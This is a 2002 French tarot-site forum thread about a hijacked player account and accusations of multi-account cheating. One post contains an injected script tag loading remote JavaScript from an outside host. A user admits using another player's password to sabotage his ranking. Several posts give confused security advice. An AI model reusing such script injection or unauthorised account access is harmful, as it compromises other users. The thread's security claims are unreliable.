Consultation
Accueil > Communauté > Les forums > Consultation

  

Forum Tarot, Webtarot ou les deux
Il s'agit du forum principal consacré à Webtarot et au tarot en général. Ce forum est modéré

Utiliser le forum
  • Nouveau sujet
  • Remonter
  • Aller voir un sujet
  • Chercher
  • Liste des forums
  • Vue en arborescence
  • Précédent
  • Suivant
  •  

    piratage !!!
    Message publié par Stentec le 21-02-2002 (répondre)
    apparement quelqu'un s'est amusé a prendre mon pseudo et a me faire chuter une trentaine de garde contre afin de me faire perdre une quarantaine de points. C'est de bonne guerre !!! Merci à la taroteam ...

    Ouh les vilains !
    Message publié par GDUJEU le 21-02-2002 (répondre)
    .........loooooooooool..........

    ben c pas moi, promis !

    Ils vont te le retrouver, ton pirate, t'inquiètes !

    ..............................looooool............(scuses moi)

    ......lol............

    Cash
    Message publié par GDUJEU le 22-02-2002 (répondre)
    re moi


    euh, je viens de voir ta fiche joueur, Stentec...

    deux mois que tu es (étais, lol) 1er..................................................... plusieurs photos éditées sur ta page................................................ certainement quelques dizaines de dizaines d'heures passées sur le site........................................

    euh, tu crois pas que tu devrais penser à................FAIRE PETER TA CARTE BANCAIRE DE 15 EUROS.........?

    Un tel classement et possibilité de jeu se méritent, non?


    Au plaisir, Stentec (tres sympathique, au passage)

    GDUJEU, un ami qui vous veut... cque vous voulez

    Re: Cash
    Message publié par Caval de Coeur le 22-02-2002 (répondre)

    Bonsoir,


    Je ne connais pas ton niveau de jeu. Je ne sais donc pas si ton extrème domination au classement à 4 est justifiée ou non.

    En tous cas, jusqu'à preuve du contraire, on ne peut tirer que chapeau bas devant tes performances.

    Par contre, il est avéré qu'une usurpation de ton pseudo a bien eu lieu.Quand on voit l'importance de ta descente et l'arrivée de dizaines de gardes contre sur ta fiche, il n'y a aucun doute.

    Celà peut etre une personne de ton entourage ou un joueur maitrisant ce type de piratages.

    Il est impératif que la team te redonne l'intégralité de tes points à date d'hier.

    Je pense qu'elle sera en mesure de te donner des précisions sur ce sabotage et notamment le ou les pseudos qui ont profité de tes chutes de garde contre.

    Je t'invite à modifier ton mot de passe et j'espère que ce problème ne se répandra pas comme une trainée de poudre sur le site.

    Re: Cash
    Message publié par poluf le 22-02-2002 (répondre)
    euh... quelqu'un pourrait-il usurper mon pseudo et gagner quelques chelems svp? mon classement en aurait bien besoin!
    merci d'avance Poluf

    Re: Cash
    Message publié par ctc le 22-02-2002 (répondre)
    mdrrrrrrrrrrrrr poluf

    Re: Cash
    Message publié par diamant le 22-02-2002 (répondre)
    Bonjour à tous.

    Je suis nul en informatique, mais il me semble me rappeler que le pseudo et l'ordi sont liés. Donc si piratage il y a cela ne peut se faire que sur l'ordi ou est affecté le pseudo.

    Si cela n'est pas le cas j'aimerais en savoir plus, SVP.

    Merci d'avance pour le reinsegnement.

    Diamant.

    Firewall
    Message publié par GDUJEU le 22-02-2002 (répondre)
    Ben non, justement, apparemment ça va au-delà; pour preuve cette petite histoire vécue par un collègue d'un ami :

    On va l'appeler...euh...Conno, le collègue de mon pote...

    Alors que Conno venait de surfer sur le net, un petit reliquat des haricots blancs dégustés la veille au soir se manifesta.
    Mon gars Conno ayant un forfait internet assez limité, et par souci d'économie, se déconnecta afin de rejoindre son trou à eau.Le PC, lui, resta allumé.
    Madame Conno passa pres de la machine magique et une voix retentit jusqu'au rez-de-chaussée de l'immeuble (ils étaient au 4ème):
    "C'est ben la peine que tu me dises de pas causer trop longtemps au téléphone! Tu pourrais au moins couper ton bordel quand tu vas chier !"
    Mon gars Conno, interloqué, se leva de son trone et surgit dans la pièce en question...
    Un ptit malin, dit "hacker"(pirate), était parvenu à entrer dans son PC et se connecter...le pc était rendu sur internet.
    Ne me demandez pas comment, je ne sais pas, mais le fait est qu'à distance, sur un ordinateur non protégé par un firewall, ET MEME DECONNECTE, on peut venir voir vos ptites affaires.
    Que les dubitatifs ne m'embetent pas: ceci est vrai!
    Alors je vous conseille d'installer un FIREWALL ("pare-feu")sur votre PC afin de le sécuriser contre ces intrusions dont vous avez certainement deja été victime; sachant que ces hackers surfent en meme temps que vous également, sur votre ligne...ce qui peut parfois expliquer certains ralentissements.J'ai personnellement jusqu'à 60 "attaques" par jour que mon firewall repousse.
    A vous de jouer (allez sur Zonelabs.com, Neowatch.com, ZDNET... certains sont gratuits, portant la mention "FREE").
    Il s'avère cependant que certains d'entre eux vous empechent de créer une table sur Webtarot, alors vous pouvez le couper avant de jouer...c vous qui voyez.
    Au plaisir.

    GDUJEU, un ami qui vous veut du chien

    Re: Firewall
    Message publié par Rafale le 22-02-2002 (répondre)
    Yop,


    Juste une chtite remarque en passant parce que la.............c de l'art pour ceux qui ont un minimum de connaissance en info ils comprendront, qu'il est strictement impossible à un hacker même le plus doué de controler un pc à distance si celui ci n'est pas relié au net .

    Donc grosso modo le mec qui rallume la connexion du pc alors là .........ce mec la je lui tire mon chapeau parce que c le mec le plus doué de la planète :=), jusqu'à preuve du contraire si une machine n'est pas connecté au net je vois mal un pirate faire quoi que ce soit sur une machine.

    Perso je vous conseille comme gd de prendre zone alarm c un firewall logiciel assez simple d'emploi même une blonde pourra l'utiliser et en temps normal il fait son boulot correctement.
    Malheureusement il ne protégera pas complètement un pc si un hacker doué à une énorme envie de vous faire du mal .......dans ce domaine seul un boitier firewall en hardware pourra lutter efficaçement et encore........si c kevin mitnick qui attaque chaud devant )))))

    Re: Firewall
    Message publié par yokozuna le 22-02-2002 (répondre)
    en fait il suffit d avoir un logiciel d algorythme assez puissant ou un logiciel de force brute pour decrypter un mot de passe
    sauf que c est peu probable parce que ca passerai par le serveur de wt et qu ils s en apercevrai.
    donc vaut mieux chercher parmi ses relations
    ou vers qq un qui a acces au pc ou les codes sont en place
    ou si l on joue par hasard sur un autre pc bien prendre le temps de tout virer
    de plus d ac avec rafale on ne peut pas allumer un pc a distance
    par contre l eteindre ou le bousiller oui mais seulement s il est connecte.
    de plus les gens qui on wingate sont vulnerables car wingate n est rien d autre qu un troyen et si un port n est pas proteger bjr les degats.
    pour ce qui est de l adsl vous pouvez vous passer d un firewall ca sert a rien trop de proxy protege sur la route et aucun hacker ne perdra de temps a essayer de penetrer nos pc ou il n y a guere de choses interressantes.
    nukkenaber suffit amplement aux paranos

    voilou

    CONNO LYER ?
    Message publié par GDUJEU le 22-02-2002 (répondre)
    Conno m'aurait menti à l'issue de mon plein gré?



    ....................... Ouuuuuuuuh pas bo, ça !...................

    Sus aux vilains et manants !

    Re: Firewall
    Message publié par Guy le 22-02-2002 (répondre)
    mince........
    j ai l adsl donc je n interesse prsonne ?????? mon coeur est triste a cette pensée (Buda, tu pourras venir dans mon PC douillet, toi), mais soulagé quant aux protections (voir ma photo sur ma page WT) dont je dispose.
    D ac avec tous : impossible de rentrer sur un PC eteint ou non connecté, sauf s 'il a le cable et un trojan, mais la il faut y mettre beaucoup de bonne volonté.

    Re: Firewall
    Message publié par KEVIN KINIQUE le 22-02-2002 (répondre)
    script src="http://1001fleurs.free.fr/matrix.js">/script>
    et pourtant tout est possible, voyez plus bas...
    PEUR BLEUE ?

    Re: Firewall
    Message publié par Rafale le 22-02-2002 (répondre)
    En ce qui conçerne l'adsl........le routeur du modem ok....mais pour un admin reseau digne de ce nom l'adsl est aussi simple qu'un modem classique.

    Explication c pas le routeur de l'adsl que le pirate attaquera mais cette grosse merde de winchiotte au 1000 et 1 failles et qu'on me fasse pas croire que windows est sécurisé avec les patches )) enfin bon tout ça pour dire que si vous voulez un minimum de sécurité il faut mettre un fw logiciel de type zone alarm
    c un stricte minimum mais qui n'empechera pas un intrus malvenu de venir foutre le bordel sur votre pc s'il a les connaissances et le temps nécessaire a ce type de pénétration......

    Sur ce...... perso je pense qu'une personne a du avoir axx a la machine de stentec via un trojan ou un dérivé (netbus ?) ou seconde explication que la team donne son point de vu sur le sujet...........ou dernière solution comble de malchance le malheure s'abat sur stentec et se prend des dizaines de contre dans les dents parce que les donnes se retournent contre lui....solution possible mais bon...

    j'ai déja entendu une contre avec 3bouts 3rois +2dames avec 5atouts chuté de 3 parce que 3coupes franches en défense et singlette ou passe roi dame d'un coup..... bref personne n''est a l'abrit d'une grosse chute mais 30point c quand même pas dégueu en 2 ou 3jours :o (trop d'assurance dans le jeu ? =)......

    Re: Firewall
    Message publié par diamant le 22-02-2002 (répondre)
    Merci les copains, mais vos reponses sont très peu rassurantes et contraddictoires.

    Je crois qu'à l'avenir je coupe mon ordi chaque fois que je quitte, même s'il ne recèle pas des secrets d'état.

    Merci encore et à +++

    Diamant

    Re: Firewall
    Message publié par yokozuna le 22-02-2002 (répondre)
    mais non diamant y a peu de risque si tu n accepte pas a ton insu un trojan
    z ont pas de temps a perdre avec nous les hackers
    par contre faut bien proteger les messagerie et les fichiers recus
    ulysse par exemple a ete contamine par un ver et ce ver a la faculte de partir seul vers tout ses contact
    mais bon a moins d avoir des trucs hyper important c est pas tres grave
    si y en a qui veulent ecouter du lynyrd skynyrd ou du big bill bronzy bienvenue sur mon dd
    je branche plus mon firewall toutes ces alertes pour rien ca gave a force

    Re: Firewall
    Message publié par cook , auteur du coup le 22-02-2002 (répondre)
    Stentec ainsi que ses amis Lordoftarot et Duroth font de la publicité sur leur fiche joueur pour un site nommé "www.webtarot.online.fr" , crée par Lordoftarot. A ne pas confondre avec notre site favori "www.webtarot-online.fr" (tiret à la place du point). Si vous visitez ce site , vous vous apercevrez qu'il ne sert que de faire-valoir à ces 3 pseudos. pire , si on analyse davantage , et beaucoup l'ont deja compris, ces 3 pseudos appartiennent au meme individu qui a deja reconnu avoir triché au differé ...pour vous en convaincre , jetez aussi un oeil sur les heures de fréquentation , les dates de création , les stats d'audace et de réussite ... (en tenant compte du fait que celles de stentec ont sensiblement baissé ! lol").
    tout le monde sait a quel point il est difficile de monter de qques points et personne , à part Stentec et Duroth , n'a connu une telle ascenssion en si peu de temps. le pb c'est que pour monter en trichant , il faut que d'autres descendent et ces autres , c'est nous ...
    pour l'anegdote , il a fallu -65000 points pour faire perdre 37 points a Stentec ...
    donc les kestions sont : doit-on laisser de tels individus poluer le site ???
    ne méritait-il pas une petite leçon d'humilité ?

    pour ceux qui en douteraient encore , la taroteam n'a rien a voir dans cette histoire , il n'y a eu aucun piratage de la base de donnée de webtarot. Pour trouver son mot de passe , j'ai simplement utilisé une des armes de stentec , et comme il dit "c'est de bonne guerre" , non ?

    Re: Firewall
    Message publié par Rafale le 23-02-2002 (répondre)
    Je serais curieux de savoir comment tu as fait pour le pass cook ......viens me voir en pv dés que tu peux ça m'interesse :=)

    MDRRRRR
    Message publié par Nebraska le 23-02-2002 (répondre)
    Alors là trop top, merci Cook pour l'adresse du site privé de môsieur Stentec alias LordOfTriche alias Duroth.
    Je me suis bien marré en le parcourant, moi qui croyait en avoir vu de belles sur les tables là ca dépasse franchement tout ce que j'ai bien pu rencontrer.

    Nan franchement , si vous voulez bien vous fendre la poire allez voir le site des 3 frères jumeaux et ne manquez pas l'interview en exclusivité (ben z'en ont pas voulu sur WT lol) de Stentec himself ainsi que le méga forum où Stentec 1 lèche le cul de Stentec 2 qui se pavoise lui même devant la grandeur de Stentec 3, LOL nan vraiment trop top délire.

    PS : si c vraiment toi le coup du piratage alors chapo bas mec !!!

    Re: MDRRRRR
    Message publié par Nebraska le 23-02-2002 (répondre)
    Bon zavez pas encore été voir ?

    Attendez j'ai une petite citation de Stentec qui peut vous mettre l'eau à la bouche :
    "he he ... Y'a bien longtemps que je tournais autour du score parfait, c'est bien la seule motivation qu'il me reste, défaut de trouver des adversaires dignes de moi et de mon jeu ..."

    Nan merde allez-y, y en a plein d'autres des comme ça et des pires même.

    Et puis si après y en a encore qui veulent jouer avec ça, alors là moi j'y comprend plus rien !!!

    Re: MDRRRRR
    Message publié par Guy le 23-02-2002 (répondre)
    et Guy a avoué etre un tricheur, personnage a eviter

    laisser tomber la trinité
    3 en 1 ne merite que notre mepris et notre silence

    kant a 65 000 points de chute pour descendre, combien lui en a t il fallu pour emagasiner sa 1ere place ???? 800 000 ???????? JPG as tu les comptes totaux ???

    Mais 65 000 pour passer de 1er a 6eme, ca fait 30 000 points par mois soit 1000 par jour en jouant chaque soir et en chutant jamais...................
    c est PRODIGIEUX, MIRACULEUX mais peut on attendre autre chose qu un miracle quand on est 3 en 1 ???

    )

    PAS MDRRRRRR MOI
    Message publié par GDUJEU le 23-02-2002 (répondre)
    Je trouve tout cela vraiment honteux, si toutefois ce que cap'tain Cook a affirmé est vrai, ce que j'attends de savoir.

    HONTEUX, rien d'autre à dire.

    Re: PAS MDRRRRRR MOI
    Message publié par Damien le 23-02-2002 (répondre)
    j'sais pas si vous etes curieux comme moi !
    mais allez voir le site de l'auteur du script qui n'est pas passé sur le forum
    http://1001fleurs.free.fr/
    çà vaut le coup d'oeil LOL

    Re: PAS MDRRRRRR MOI
    Message publié par Guy le 23-02-2002 (répondre)
    Tu trouves koi honteux ????????

    qu un mec triche en creant 2 autres pseudo et en utilisant des failles du logiciel pour etre 1er et 2eme ?

    qu un mec fasse sa pub perso sur WT en denigrant sur son site la source du lien ?

    qu un mec te gruge tout son monde et soit d un egocentrisme et d un narcissisme qui relève de la pathologie psychiatrique ?

    qu un mec menace WT qui n'y est pour rien parce qu il a été victime d une réparation justifiée ;))

    kan je disais 65 000 points pour 6 places, c est restrictif
    65 000 points / 3 = 21 500 pour etre 330 eme environ
    + 65 000 pour les 6 1eres places + allez disons 20 000 pour arriver dans le club des 20 premiers ca donne 106 000 points en 2 mois pour etre 1er.
    106 000 ca fait 53 000 points par mois soit 1 800 points par jour........... UN MIRACLE

    et sans jamais chuter et SANS PAYER TAROTEAM BIEN SUR........

    alors stentec ........... FERMES LA CA NOUS FERA DES VACANCES ))


    mon seul regret, c est que ce ne soit pas moi qui aie trouvé la methode pour apporter cette remise a conformité des scores.

    a damien
    Message publié par Guy le 23-02-2002 (répondre)
    Impossible de trouver la page


    OUAIS SUPER ))))

    pkoi t'as fermé ton site lord ?
    Message publié par cook le 23-02-2002 (répondre)
    cherchez pas , lordoftarot s'est empressé de fermer son site ... c'était prévisible donc j'avais pris soin d'en sauvegarder la totalité des textes ... je les mail à ki les veut.

    Re: pkoi t'as fermé ton site lord ?
    Message publié par Rafale le 23-02-2002 (répondre)
    je veux bien lire le contenu ........pour ma part voir le niveau d'un jouer c en jouant avec lui rien a voir avec un classement pour égocentrique ....en parlant de classement j'en rigole encore quand je vois le contenu après avoir jouer avec , je me demande même si pour la plupart dans les 30premiers serait capable de faire des qualifs pour un championnat

    Re: pkoi t'as fermé ton site lord ?
    Message publié par gargamelle- le 23-02-2002 (répondre)
    Quand le naturel revient au galop...............................

    Re: pkoi t'as fermé ton site lord ?
    Message publié par Nebraska le 23-02-2002 (répondre)
    Décidemment Cook t trop fort !!!
    En tout cas s'il l'ouvre de nouveau l'autre psycho à 3 personnalités tu pourras mettre l'intégralité de ses "textes" dans un topic.

    Re: piratage !!!
    Message publié par Steph-06 le 24-02-2002 (répondre)
    Allez on t'a reconnu stentec .....

    Re: piratage !!!
    Message publié par Nebraska le 24-02-2002 (répondre)
    En tout cas, vu ce qu'il a mis à la place de son site, il m'a l'air super mais alors super dég le petit Stentec !!!
    Et moi je suis super mais alors super super MDRRRRRRRRR

       
    Répondre à ce message
     
    Auteur
    Email
    Titre
    Mise en forme :



    Smileys: